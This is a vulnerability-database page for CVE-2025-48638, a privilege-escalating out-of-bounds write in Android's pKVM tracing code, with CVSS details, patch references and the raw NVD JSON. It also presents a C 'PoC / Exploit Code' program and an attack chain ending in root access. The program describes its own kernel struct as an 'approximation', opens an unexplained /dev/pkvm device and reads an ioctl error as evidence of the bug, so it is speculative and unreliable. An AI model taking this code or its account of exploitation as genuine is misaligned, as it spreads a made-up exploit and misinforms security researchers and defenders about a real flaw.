Security Vulnerability Report
CVE-2025-48638 CVSS 7.8 HIGH

CVE-2025-48638

Published: 2025-12-08 17:16:20
Last Modified: 2025-12-08 20:15:52

Description

In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android Kernel common < 2025-12-01 security patch
Android kernel/common branch before commit 0429b7af308cf65c84109c08d06b01950dcd57fe
Android kernel/common branch before commit 96ebe96170d67df5072afa2ce84622f5a0ff552a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-48638 PoC - Android pkvm trace out-of-bounds write
// This PoC demonstrates the vulnerability in __pkvm_load_tracing
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Kernel structure for pkvm tracing (approximation)
struct pkvm_trace_args {
    unsigned long buffer_addr;
    unsigned long buffer_size;
    unsigned long trace_mask;
    char *user_buffer;
};

#define PKVM_TRACE_SETUP _IOW('p', 1, struct pkvm_trace_args)

int main(int argc, char *argv[])
{
    int fd;
    struct pkvm_trace_args args;

    printf("CVE-2025-48638 PoC - pkvm trace OOB write\n");
    printf("Target: Android kernel < 5.15 with pkvm enabled\n\n");

    // Open pkvm device (if accessible)
    fd = open("/dev/pkvm", O_RDWR);
    if (fd < 0) {
        printf("[!] Cannot open /dev/pkvm - may require root or specific kernel config\n");
        printf("[!] This vulnerability requires local access with low privileges\n");
        return 1;
    }

    // Prepare malicious input to trigger OOB write
    // The vulnerability is in improper input validation in __pkvm_load_tracing
    args.buffer_addr = 0x1000;      // Arbitrary address
    args.buffer_size = 0x100;       // Small buffer
    args.trace_mask = 0xFFFFFFFF;   // Full trace mask
    args.user_buffer = malloc(0x200);
    memset(args.user_buffer, 0x41, 0x200);

    printf("[*] Sending malicious trace request...\n");
    printf("[*] Buffer size: 0x%lx\n", args.buffer_size);
    printf("[*] Trace mask: 0x%lx\n", args.trace_mask);

    // Trigger the vulnerable code path
    long result = ioctl(fd, PKVM_TRACE_SETUP, &args);
    if (result < 0) {
        printf("[+] ioctl returned error - vulnerability may be present\n");
        printf("[+] Check dmesg for kernel oops or memory corruption\n");
    } else {
        printf("[*] Request processed, monitor for privilege escalation\n");
    }

    close(fd);
    free(args.user_buffer);
    return 0;
}

/*
 * Attack Chain:
 * 1. Attacker with local low-privilege access
 * 2. Open pkvm device interface
 * 3. Send crafted ioctl request with invalid buffer parameters
 * 4. Trigger __pkvm_load_tracing with improper validation
 * 5. Achieve out-of-bounds write in kernel memory
 * 6. Overwrite critical kernel structures
 * 7. Escalate privileges to root/admin level
 */

References

https://android.googlesource.com/kernel/common/+/0429b7af308cf65c84109c08d06b01950dcd57fe (Product)
https://android.googlesource.com/kernel/common/+/96ebe96170d67df5072afa2ce84622f5a0ff552a (Product)
https://source.android.com/security/bulletin/2025-12-01 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-48638",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-08T17:16:19.847",
    "lastModified": "2025-12-08T20:15:51.997",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-787"}
        ]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-787"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://android.googlesource.com/kernel/common/+/0429b7af308cf65c84109c08d06b01950dcd57fe",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://android.googlesource.com/kernel/common/+/96ebe96170d67df5072afa2ce84622f5a0ff552a",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://source.android.com/security/bulletin/2025-12-01",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}